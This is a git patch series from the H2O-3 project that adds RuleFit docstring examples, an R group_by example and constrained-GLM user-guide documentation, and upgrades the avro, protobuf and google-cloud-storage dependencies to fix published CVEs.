From 99aafb037de55f0dd3de992ee1c121212a3f574f Mon Sep 17 00:00:00 2001 From: Shaun <124687868+shaunyogeshwaran@users.noreply.github.com> Date: Fri, 11 Oct 2024 21:04:28 +0530 Subject: [PATCH 01/12] added rule_example (#16415) added predict_rules. added example for algorithm. added max_categorical_levels example. added max_num_rules example added min_rule_length example. added model_type example. added distribution example added rule_generateion_ntrees example. --- h2o-bindings/bin/custom/python/gen_rulefit.py | 158 ++++++++++++++++- h2o-py/h2o/estimators/rulefit.py | 162 +++++++++++++++++- 2 files changed, 318 insertions(+), 2 deletions(-) diff --git a/h2o-bindings/bin/custom/python/gen_rulefit.py b/h2o-bindings/bin/custom/python/gen_rulefit.py index 55a01c4057db..9ac14b842743 100644 --- a/h2o-bindings/bin/custom/python/gen_rulefit.py +++ b/h2o-bindings/bin/custom/python/gen_rulefit.py @@ -6,6 +6,21 @@ def rule_importance(self): Retrieve rule importances for a Rulefit model :return: H2OTwoDimTable + + :examples: + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" + >>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) + >>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] + >>> y = "survived" + >>> rfit = H2ORuleFitEstimator(max_rule_length=10, + ... max_num_rules=100, + ... seed=1) + >>> rfit.train(training_frame=df, x=x, y=y) + >>> rule_importance = rfit.rule_importance() + >>> print(rfit.rule_importance()) """ if self._model_json["algo"] != "rulefit": raise H2OValueError("This function is available for Rulefit models only") @@ -18,11 +33,29 @@ def rule_importance(self): def predict_rules(self, frame, rule_ids): """ - Evaluates validity of the given rules on the given data. + Evaluates validity of the given rules on the given data. :param frame: H2OFrame on which rule validity is to be evaluated :param rule_ids: string array of rule ids to be evaluated against the frame :return: H2OFrame with a column per each input ruleId, representing a flag whether given rule is applied to the observation or not. + + :examples: + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/iris/iris_train.csv" + >>> df = h2o.import_file(path=f, col_types={'species': "enum"}) + >>> x = df.columns + >>> y = "species" + >>> x.remove(y) + >>> train, test = df.split_frame(ratios=[.8], seed=1234) + >>> rfit = H2ORuleFitEstimator(min_rule_length=4, + ... max_rule_length=5, + ... max_num_rules=3, + ... seed=1234, + ... model_type="rules") + >>> rfit.train(training_frame=train, x=x, y=y, validation_frame=test) + >>> print(rfit.predict_rules(train, ['M0T38N5_Iris-virginica'])) """ from h2o.frame import H2OFrame from h2o.utils.typechecks import assert_is_type @@ -52,3 +85,126 @@ def predict_rules(self, frame, rule_ids): """ ), ) + +examples = dict( + algorithm=""" +>>> import h2o +>>> h2o.init() +>>> from h2o.estimators import H2ORuleFitEstimator +>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" +>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) +>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] +>>> y = "survived" +>>> rfit = H2ORuleFitEstimator(max_rule_length=10, +... max_num_rules=100, +... algorithm="gbm", +... seed=1) +>>> rfit.train(training_frame=df, x=x, y=y) +>>> print(rfit.rule_importance()) + +""", + max_categorical_levels=""" +>>> import h2o +>>> h2o.init() +>>> from h2o.estimators import H2ORuleFitEstimator +>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" +>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) +>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] +>>> y = "survived" +>>> rfit = H2ORuleFitEstimator(max_rule_length=10, +... max_num_rules=100, +... max_categorical_levels=11, +... seed=1) +>>> rfit.train(training_frame=df, x=x, y=y) +>>> print(rfit.rule_importance()) +""", + max_num_rules=""" +>>> import h2o +>>> h2o.init() +>>> from h2o.estimators import H2ORuleFitEstimator +>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" +>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) +>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] +>>> y = "survived" +>>> rfit = H2ORuleFitEstimator(max_rule_length=10, +... max_num_rules=3, +... seed=1) +>>> rfit.train(training_frame=df, x=x, y=y) +>>> print(rfit.rule_importance()) +""", + min_rule_length=""" +>>> import h2o +>>> h2o.init() +>>> from h2o.estimators import H2ORuleFitEstimator +>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" +>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) +>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] +>>> y = "survived" +>>> rfit = H2ORuleFitEstimator(max_rule_length=10, +... max_num_rules=100, +... min_rule_length=4, +... seed=1) +>>> rfit.train(training_frame=df, x=x, y=y) +>>> print(rfit.rule_importance()) +""", + max_rule_length=""" +>>> import h2o +>>> h2o.init() +>>> from h2o.estimators import H2ORuleFitEstimator +>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" +>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) +>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] +>>> y = "survived" +>>> rfit = H2ORuleFitEstimator(max_rule_length=10, +... max_num_rules=100, +... min_rule_length=3, +... seed=1) +>>> rfit.train(training_frame=df, x=x, y=y) +>>> print(rfit.rule_importance()) +""", + model_type=""" +>>> import h2o +>>> h2o.init() +>>> from h2o.estimators import H2ORuleFitEstimator +>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" +>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) +>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] +>>> y = "survived" +>>> rfit = H2ORuleFitEstimator(max_rule_length=10, +... max_num_rules=100, +... model_type="rules", +... seed=1) +>>> rfit.train(training_frame=df, x=x, y=y) +>>> print(rfit.rule_importance()) +""", + distribution=""" +>>> import h2o +>>> h2o.init() +>>> from h2o.estimators import H2ORuleFitEstimator +>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" +>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) +>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] +>>> y = "survived" +>>> rfit = H2ORuleFitEstimator(max_rule_length=10, +... max_num_rules=100, +... distribution="bernoulli", +... seed=1) +>>> rfit.train(training_frame=df, x=x, y=y) +>>> print(rfit.rule_importance()) +""", + rule_generation_ntrees=""" +>>> import h2o +>>> h2o.init() +>>> from h2o.estimators import H2ORuleFitEstimator +>>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" +>>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) +>>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] +>>> y = "survived" +>>> rfit = H2ORuleFitEstimator(max_rule_length=10, +... max_num_rules=100, +... rule_generation_ntrees=60, +... seed=1) +>>> rfit.train(training_frame=df, x=x, y=y) +>>> print(rfit.rule_importance()) +""" +) diff --git a/h2o-py/h2o/estimators/rulefit.py b/h2o-py/h2o/estimators/rulefit.py index 529b371780ea..be80309794b0 100644 --- a/h2o-py/h2o/estimators/rulefit.py +++ b/h2o-py/h2o/estimators/rulefit.py @@ -206,6 +206,22 @@ def algorithm(self): The algorithm to use to generate rules. Type: ``Literal["auto", "drf", "gbm"]``, defaults to ``"auto"``. + + :examples: + + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" + >>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) + >>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] + >>> y = "survived" + >>> rfit = H2ORuleFitEstimator(max_rule_length=10, + ... max_num_rules=100, + ... algorithm="gbm", + ... seed=1) + >>> rfit.train(training_frame=df, x=x, y=y) + >>> print(rfit.rule_importance()) """ return self._parms.get("algorithm") @@ -220,6 +236,22 @@ def min_rule_length(self): Minimum length of rules. Defaults to 3. Type: ``int``, defaults to ``3``. + + :examples: + + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" + >>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) + >>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] + >>> y = "survived" + >>> rfit = H2ORuleFitEstimator(max_rule_length=10, + ... max_num_rules=100, + ... min_rule_length=4, + ... seed=1) + >>> rfit.train(training_frame=df, x=x, y=y) + >>> print(rfit.rule_importance()) """ return self._parms.get("min_rule_length") @@ -234,6 +266,22 @@ def max_rule_length(self): Maximum length of rules. Defaults to 3. Type: ``int``, defaults to ``3``. + + :examples: + + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" + >>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) + >>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] + >>> y = "survived" + >>> rfit = H2ORuleFitEstimator(max_rule_length=10, + ... max_num_rules=100, + ... min_rule_length=3, + ... seed=1) + >>> rfit.train(training_frame=df, x=x, y=y) + >>> print(rfit.rule_importance()) """ return self._parms.get("max_rule_length") @@ -249,6 +297,21 @@ def max_num_rules(self): by diminishing returns in model deviance. Type: ``int``, defaults to ``-1``. + + :examples: + + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" + >>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) + >>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] + >>> y = "survived" + >>> rfit = H2ORuleFitEstimator(max_rule_length=10, + ... max_num_rules=3, + ... seed=1) + >>> rfit.train(training_frame=df, x=x, y=y) + >>> print(rfit.rule_importance()) """ return self._parms.get("max_num_rules") @@ -263,6 +326,22 @@ def model_type(self): Specifies type of base learners in the ensemble. Type: ``Literal["rules_and_linear", "rules", "linear"]``, defaults to ``"rules_and_linear"``. + + :examples: + + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" + >>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) + >>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] + >>> y = "survived" + >>> rfit = H2ORuleFitEstimator(max_rule_length=10, + ... max_num_rules=100, + ... model_type="rules", + ... seed=1) + >>> rfit.train(training_frame=df, x=x, y=y) + >>> print(rfit.rule_importance()) """ return self._parms.get("model_type") @@ -298,6 +377,22 @@ def distribution(self): Type: ``Literal["auto", "bernoulli", "multinomial", "gaussian", "poisson", "gamma", "tweedie", "laplace", "quantile", "huber"]``, defaults to ``"auto"``. + + :examples: + + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" + >>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) + >>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] + >>> y = "survived" + >>> rfit = H2ORuleFitEstimator(max_rule_length=10, + ... max_num_rules=100, + ... distribution="bernoulli", + ... seed=1) + >>> rfit.train(training_frame=df, x=x, y=y) + >>> print(rfit.rule_importance()) """ return self._parms.get("distribution") @@ -312,6 +407,22 @@ def rule_generation_ntrees(self): Specifies the number of trees to build in the tree model. Defaults to 50. Type: ``int``, defaults to ``50``. + + :examples: + + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" + >>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) + >>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] + >>> y = "survived" + >>> rfit = H2ORuleFitEstimator(max_rule_length=10, + ... max_num_rules=100, + ... rule_generation_ntrees=60, + ... seed=1) + >>> rfit.train(training_frame=df, x=x, y=y) + >>> print(rfit.rule_importance()) """ return self._parms.get("rule_generation_ntrees") @@ -370,6 +481,22 @@ def max_categorical_levels(self): for categorical_encoding == EnumLimited. Type: ``int``, defaults to ``10``. + + :examples: + + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" + >>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) + >>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] + >>> y = "survived" + >>> rfit = H2ORuleFitEstimator(max_rule_length=10, + ... max_num_rules=100, + ... max_categorical_levels=11, + ... seed=1) + >>> rfit.train(training_frame=df, x=x, y=y) + >>> print(rfit.rule_importance()) """ return self._parms.get("max_categorical_levels") @@ -385,6 +512,21 @@ def rule_importance(self): Retrieve rule importances for a Rulefit model :return: H2OTwoDimTable + + :examples: + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/gbm_test/titanic.csv" + >>> df = h2o.import_file(path=f, col_types={'pclass': "enum", 'survived': "enum"}) + >>> x = ["age", "sibsp", "parch", "fare", "sex", "pclass"] + >>> y = "survived" + >>> rfit = H2ORuleFitEstimator(max_rule_length=10, + ... max_num_rules=100, + ... seed=1) + >>> rfit.train(training_frame=df, x=x, y=y) + >>> rule_importance = rfit.rule_importance() + >>> print(rfit.rule_importance()) """ if self._model_json["algo"] != "rulefit": raise H2OValueError("This function is available for Rulefit models only") @@ -397,11 +539,29 @@ def rule_importance(self): def predict_rules(self, frame, rule_ids): """ - Evaluates validity of the given rules on the given data. + Evaluates validity of the given rules on the given data. :param frame: H2OFrame on which rule validity is to be evaluated :param rule_ids: string array of rule ids to be evaluated against the frame :return: H2OFrame with a column per each input ruleId, representing a flag whether given rule is applied to the observation or not. + + :examples: + >>> import h2o + >>> h2o.init() + >>> from h2o.estimators import H2ORuleFitEstimator + >>> f = "https://s3.amazonaws.com/h2o-public-test-data/smalldata/iris/iris_train.csv" + >>> df = h2o.import_file(path=f, col_types={'species': "enum"}) + >>> x = df.columns + >>> y = "species" + >>> x.remove(y) + >>> train, test = df.split_frame(ratios=[.8], seed=1234) + >>> rfit = H2ORuleFitEstimator(min_rule_length=4, + ... max_rule_length=5, + ... max_num_rules=3, + ... seed=1234, + ... model_type="rules") + >>> rfit.train(training_frame=train, x=x, y=y, validation_frame=test) + >>> print(rfit.predict_rules(train, ['M0T38N5_Iris-virginica'])) """ from h2o.frame import H2OFrame from h2o.utils.typechecks import assert_is_type From d97dca2276442209e1601d7d5fdacd26efc73f2b Mon Sep 17 00:00:00 2001 From: Hannah <52463461+hannah-tillman@users.noreply.github.com> Date: Tue, 15 Oct 2024 10:28:37 -0500 Subject: [PATCH 02/12] GH-16338: Added group by clarification R example for `gb.control` (#16404) * ht/base example * ht/added prediction * ht/code test & example headers * ht/fixed rendering --- h2o-docs/src/product/data-munging/groupby.rst | 63 ++++++++++++++++++- 1 file changed, 61 insertions(+), 2 deletions(-) diff --git a/h2o-docs/src/product/data-munging/groupby.rst b/h2o-docs/src/product/data-munging/groupby.rst index 2e87f7a6f2ff..f87e278a685e 100644 --- a/h2o-docs/src/product/data-munging/groupby.rst +++ b/h2o-docs/src/product/data-munging/groupby.rst @@ -66,8 +66,10 @@ In addition to the above parameters, any number of the following aggregations ca Once the aggregation operations are complete, calling the GroupBy object with a new set of aggregations will yield no effect. You must generate a new GroupBy object in order to apply a new aggregation on it. In addition, certain aggregations are only defined for numerical or categorical columns. An error will be thrown for calling aggregation on the wrong data types. -Example -------- +Examples +-------- + +The following examples in Python and R show how to find the months with the highest cancellation using ``group_by``. .. tabs:: .. code-tab:: python @@ -212,3 +214,60 @@ Example 4 ALB 3646 49 50 5 AMA 317 4 6 6 ANC 100 0 1 + +The following R code shows the options by-variable with ``gb.control``. + +.. tabs:: + + .. code-tab:: r R + + # Import H2O-3: + library(h2o) + h2o.init() + + # Import the airlines dataset: + airlines.hex <- h2o.importFile("https://s3.amazonaws.com/h2o-airlines-unpacked/allyears2k.csv") + + # View quantiles and histograms: + quantile(x = airlines.hex$ArrDelay, na.rm = TRUE) + h2o.hist(airlines.hex$ArrDelay) + + # Find the number of flights by airport: + originFlights <- h2o.group_by(data = airlines.hex, by = "Origin", nrow("Origin"), gb.control <- list(na.methods = "rm")) + originFlights.R <- as.data.frame(originFlights) + + # Find the number of flights per month: + flightsByMonth <- h2o.group_by(data = airlines.hex, by = "Month", nrow("Month"), gb.control <- list(na.methods = "rm")) + flightsByMonth.R <- as.data.frame(flightsByMonth) + + # Find months with the highest cancellation ratio: + which(colnames(airlines.hex)=="Cancelled") + cancellationsByMonth <- h2o.group_by(data = airlines.hex, by = "Month", sum("Cancelled"), gb.control <- list(na.methods = "rm")) + cancellation_rate <- cancellationsByMonth$sum_Cancelled/flightsByMonth$nrow + rates_table <- h2o.cbind(flightsByMonth$Month, cancellation_rate) + rates_table.R <- as.data.frame(rates_table) + + # Construct test and train sets using sampling: + airlines.split <- h2o.splitFrame(data = airlines.hex, ratio = 0.85) + airlines.train <- airlines.split[[1]] + airlines.test <- airlines.split[[2]] + + # Display a summary using table-like functions: + h2o.table(airlines.train$Cancelled) + h2o.table(airlines.test$Cancelled) + + # Set the predictor and response variables: + Y <- "IsDepDelayed" + X <- c("Origin", "Dest", "DayofMonth", "Year", "UniqueCarrier", "DayOfWeek", "Month", "DepTime", "ArrTime", "Distance") + + # Define the data for the model and display the results: + airlines.glm <- h2o.glm(training_frame = airlines.train, x = X, y = Y, family = "binomial", alpha = 0.5) + + # View the model information (training statistics, performance, important variables): + summary(airlines.glm) + + # Predict using the GLM model: + pred <- h2o.predict(object = airlines.glm, newdata = airlines.test) + + # Look at the summary of predictions (probability of TRUE class p1): + summary(pred$p1) From 248aa6458246584099484c567782f1619f1b06f6 Mon Sep 17 00:00:00 2001 From: Adam Valenta Date: Wed, 16 Oct 2024 17:12:06 +0200 Subject: [PATCH 03/12] GH-16416 - update avro to fix CVE-2024-47561 (#16422) --- h2o-parsers/h2o-avro-parser/build.gradle | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/h2o-parsers/h2o-avro-parser/build.gradle b/h2o-parsers/h2o-avro-parser/build.gradle index be498665d8ed..d61f58043d90 100644 --- a/h2o-parsers/h2o-avro-parser/build.gradle +++ b/h2o-parsers/h2o-avro-parser/build.gradle @@ -6,7 +6,7 @@ description = "H2O Avro Parser" dependencies { api project(":h2o-core") // Avro support - api 'org.apache.avro:avro:1.11.3' + api 'org.apache.avro:avro:1.11.4' testImplementation project(":h2o-test-support") testRuntimeOnly project(":${defaultWebserverModule}") From dd4458746b2b15aa9372ae166de1dddb9647537b Mon Sep 17 00:00:00 2001 From: Hannah <52463461+hannah-tillman@users.noreply.github.com> Date: Sun, 20 Oct 2024 19:12:08 -0500 Subject: [PATCH 04/12] GH-16208: Adding constrained GLM documentation to user guidem [nocheck] [nochecks] (#16394) * ht/constrained glm integration * ht/max_iterations * ht/initial review equations * ht/remove below eq5 * ht/added in examples * ht/requested changes --- h2o-docs/src/product/data-science/glm.rst | 219 ++++++++++++++++++++++ 1 file changed, 219 insertions(+) diff --git a/h2o-docs/src/product/data-science/glm.rst b/h2o-docs/src/product/data-science/glm.rst index 565648f504db..161d57698fdc 100644 --- a/h2o-docs/src/product/data-science/glm.rst +++ b/h2o-docs/src/product/data-science/glm.rst @@ -63,6 +63,8 @@ Algorithm-specific parameters - `interaction_pairs `__: When defining interactions, use this option to specify a list of pairwise column interactions (interactions between two variables). Note that this is different than ``interactions``, which will compute all pairwise combinations of specified columns. +**max_iterations**: For GLM, must be :math:`\geq` 1 to obtain a proper model (or -1 for unlimited which is the default setting). Setting it to 0 will only return the correct coefficient names and an empty model. + - **max_iterations_dispersion**: Control the maximum number of iterations in the dispersion parameter estimation loop using maximum likelihood. This option defaults to ``1000000``. - `rand_family `__: The Random Component Family specified as an array. You must include one family for each random component. Currently only ``rand_family=["gaussisan"]`` is supported. @@ -1623,6 +1625,219 @@ Variable Inflation Factor Example vif_glm.get_variable_inflation_factors() {'Intercept': nan, 'abs.C1.': 1.0003341467438167, 'abs.C2.': 1.0001734204183244, 'abs.C3.': 1.0007846189027745, 'abs.C4.': 1.0005388379729434, 'abs.C5.': 1.0005349427184604} +Constrained GLM +~~~~~~~~~~~~~~~ + +We've implemented the algorithm from Bierlaire's *Optimization: Priciples and Algorithms, Chapter 19* [:ref:`8`] where we're basically trying to solve the following optimization problem: + +.. math:: + + \min_{X\in R^n} f(x), \text{subject to } h(x) = 0, g(x) \leq 0 \quad \text{ equation 1} + +where: + + - :math:`f: R^n \to R,h: R^n \to R^m,g: R^n \to R^p` + - the constraints :math:`h,g` are linear. + +However, the actual problem we are solving is: + +.. math:: + + \min_{X\in R^n} f(x) \text{ subject to } h(x)=0 \quad \text{ equation 2} + +The inequalities constraints can be easily converted to equalities constraints through simple reasoning and using active constraints. We solve the constrained optimization problem by solving the augmented Lagrangian function using the quadratic penalty: + +.. math:: + + L_c(x,\lambda) = f(x) + \lambda^T h(x) + \frac{c}{2} \| h(x) \|^2 \quad \text{ equation 3} + +The basic ideas used to solve the constrained GLM consist of: + +a. transforming a constrained problem into a sequence of unconstrained problems; +b. penalizing more and more the possible violation of the constraints during the sequence by continuously increasing the value of :math:`c` at each iteration. + +Converting to standard form +''''''''''''''''''''''''''' + +A standard form of :math:`g(x) \leq 0` is the only acceptable form of inequality constraints. For example, if you have a constraint of :math:`2x_1 - 4x_2 \geq 10` where :math:`x_1 \text{ and } x_4` are coefficient names, then you must convert it to :math:`10-2x_1 + 4x_2 \leq 0`. + +Example of constrained GLM +'''''''''''''''''''''''''' + +.. tabs:: + .. code-tab:: r R + + # Import the Gaussian 10,000 rows dataset: + h2o_data <- h2o.importFile("https://s3.amazonaws.com/h2o-public-test-data/smalldata/glm_test/gaussian_20cols_10000Rows.csv") + + # Set the predictors, response, and enum columns: + enum_columns = c("C1", "C2", "C3", "C4", "C5", "C6", "C7", "C8", "C9", "C10") + for (cname in enum_columns) { + h2o.asfactor(h2o_data[cname]) + } + myY = "C21" + col_names <- names(h2o_data) + myX <- col_names[1:20] + + # Set the constraints: + constraints <- data.frame(names <- c("C1.2", "C11", "constant", "C5.2", "C12", "C15", "constant"), + values <- c(1, 1, 13.56, 1, 1, 1, -5), + types <- c("Equal", "Equal", "Equal", "LessThanEqual", "LessThanEqual", "LessThanEqual", "LessThanEqual"), + constraint_numbers <- c(0, 0, 0, 1, 1, 1, 1)) + constraints_h2o <- as.h2o(constraints) + + # Set the beta constraints: + bc <- data.frame(names <- c("C1.1", "C5.2", "C11", "C15"), + lower_bounds <- c(-36, -14, 25, 14), + upper_bounds <- c(-35, -13, 26, 15)) + bc_h2o <- as.h2o(bc) + + # Build and train your model: + m_sep <- h2o.glm(x=myX, + y=myY, + training_frame=h2o.data, + family='gaussian', + linear_constraints=constraints, + solver="irlsm", + lambda=0.0, + beta_constraints=bc_h2o, + constraint_eta0=0.1, + constraint_tau=10, + constraint_alpha=0.01, + constraint_beta=0.9, + constraint_c0=100) + + # Find your coefficients: + h2o.coef(m_sep) + + .. code-tab:: python + + # Import the Gaussian 10,000 rows dataset: + h2o_data = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/glm_test/gaussian_20cols_10000Rows.csv") + + # Set the predictors, response, and enum columns: + enum_columns = ["C1", "C2", "C3", "C4", "C5", "C6", "C7", "C8", "C9", "C10"] + ffor cname in enum_columns: + h2o_data[cname] = h2o_data[cname].asfactor() + myY = "C21" + myX = h2o_data.names.remove(myY) + + # Set the linear constraints: + linear_constraints = [] # this constraint is satisfied by default coefficient initialization + name = "C1.2" + values = 1 + types = "Equal" + contraint_numbers = 0 + linear_constraints.append([name, values, types, contraint_numbers]) + + name = "C11" + values = 1 + types = "Equal" + contraint_numbers = 0 + linear_constraints.append([name, values, types, contraint_numbers]) + + name = "constant" + values = 13.56 + types = "Equal" + contraint_numbers = 0 + linear_constraints.append([name, values, types, contraint_numbers]) + + name = "C5.2" + values = 1 + types = "LessThanEqual" + contraint_numbers = 1 + linear_constraints.append([name, values, types, contraint_numbers]) + + name = "C12" + values = 1 + types = "LessThanEqual" + contraint_numbers = 1 + linear_constraints.append([name, values, types, contraint_numbers]) + + name = "C15" + values = 1 + types = "LessThanEqual" + contraint_numbers = 1 + linear_constraints.append([name, values, types, contraint_numbers]) + + name = "constant" + values = -5 + types = "LessThanEqual" + contraint_numbers = 1 + linear_constraints.append([name, values, types, contraint_numbers]) + + linear_constraints2 = h2o.H2OFrame(linear_constraints) + linear_constraints2.set_names(["names", "values", "types", "constraint_numbers"]) + + # Set the beta constraints: + bc = [] + name = "C1.1" + c1p1LowerBound = -36 + c1p1UpperBound=-35 + bc.append([name, c1p1LowerBound, c1p1UpperBound]) + + name = "C5.2" + c5p2LowerBound=-14 + c5p2UpperBound=-13 + bc.append([name, c5p2LowerBound, c5p2UpperBound]) + + name = "C11" + c11LowerBound=25 + c11UpperBound=26 + bc.append([name, c11LowerBound, c11UpperBound]) + + name = "C15" + c15LowerBound=14 + c15UpperBound=15 + bc.append([name, c15LowerBound, c15UpperBound]) + + beta_constraints = h2o.H2OFrame(bc) + beta_constraints.set_names(["names", "lower_bounds", "upper_bounds"]) + + # Build and train your model: + m_sep = glm(family='gaussian', + linear_constraints=linear_constraints2, + solver="irlsm", + lambda_=0.0, + beta_constraints=beta_constraints, + constraint_eta0=0.1, + constraint_tau=10, + constraint_alpha=0.01, + constraint_beta=0.9, + constraint_c0=100) + m_sep.train(training_frame=h2o_data,x=myX, y=myY) + + # Find your coefficients: + coef_sep = m_sep.coef() + + +Treatment of strict inequalities +^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + +To convert a strict inequality, just add a small number to it. For example, :math:`2x_1 - 4x_2 < 0` can be converted to :math:`2x_1 - 4x_2 - 10^{-12} \leq 0`. + +Transforming inequality constraints to equality constraints +''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' + +This transformation is going to use slack variables which are introduced to replace an inequality constraint by an equality constraint. The slack variable should be non-negative. To transform inequality constraints to equality constraints, we proceed as follows: + +a. For each inequality constraint of :math:`g(x)`, a slack variable is added to it such that you will have: :math:`g_i(x) - s_i^2 = 0`; +b. Let :math:`s = \begin{bmatrix} s_1^2 \\ \vdots \\ s_p^2 \\\end{bmatrix}` and :math:`g_{aug}(x) = g(x) - s`; +c. When :math:`g_i(x) \leq 0`, the constraint is satisfied and can therefore be ignored and declared inactive; +d. The inequality constraints are violated only when :math:`g_i(x) - s_i^2 \geq 0`. This is because it implies that :math:`g_i(x) \geq s_i^2 \geq 0` and this isn't allowed. Therefore, :math:`geq(x)` only includes the :math:`g_i(x)` when you have :math:`g_i(x) \geq 0`; +e. Therefore, you have :math:`h_a(x) = \begin{bmatrix} h(x) \\ geq(x) \\\end{bmatrix}`, where :math:`h(x)` is the original equality constraint and :math:`geq(x)` contains the inequality constraints that satisfied the condition :math:`g_i(x) \geq 0`; +f. The optimization problem in *equation 1* can now be rewritten as: + +.. math:: + + \min_{X\in R^n} f(x), \text{ subject to } h_a(x) = 0 \quad \text{ equation 4} + +g. The augmented Lagrangian function you will solve from *equation 4* becomes: + +.. math:: + + L_c(x, \lambda) = f(x) + \lambda^T h_a(x) + \frac{c}{2} \|h_a(x)\|^2 \quad \text{ equation 5} + Modifying or Creating a Custom GLM Model ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ @@ -2006,3 +2221,7 @@ Technometrics 19.4 (1977): 415-428. `Ronnegard, Lars. HGLM course at the Roslin Institute, http://users.du.se/~lrn/DUweb/Roslin/RoslinCourse_hglmAlgorithm_Nov13.pdf. `__ `Balzer, Laura B, and van der Laan, Mark J. "Estimating Effects on Rare Outcomes: Knowledge is Power." U.C. Berkeley Division of Biostatistics Working Paper Series (2013) `__. + +.. _ref8: + +Michel Bierlaire, Optimization: Principles and Algorithms, Chapter 19, EPEL Press, second edition, 2018 From eaccd47e0535c8b40f94b7d0459f1c74069aa8ff Mon Sep 17 00:00:00 2001 From: Adam Valenta Date: Mon, 21 Oct 2024 18:33:35 +0200 Subject: [PATCH 05/12] GH-16423 upgrade protobuf , google-cloud-storage, and fix CVE-2024-7254 (#16426) * upgrade google-cloud-storage to newest * upgarde protobuf and exclude the one from hadoop-common --- h2o-assemblies/main/build.gradle | 3 ++- h2o-persist-gcs/build.gradle | 2 +- 2 files changed, 3 insertions(+), 2 deletions(-) diff --git a/h2o-assemblies/main/build.gradle b/h2o-assemblies/main/build.gradle index e2c718abcef4..25bc231de6a4 100644 --- a/h2o-assemblies/main/build.gradle +++ b/h2o-assemblies/main/build.gradle @@ -33,6 +33,7 @@ dependencies { exclude group: "org.apache.curator" exclude group: "org.apache.zookeeper" exclude group: "org.eclipse.jetty" + exclude group: 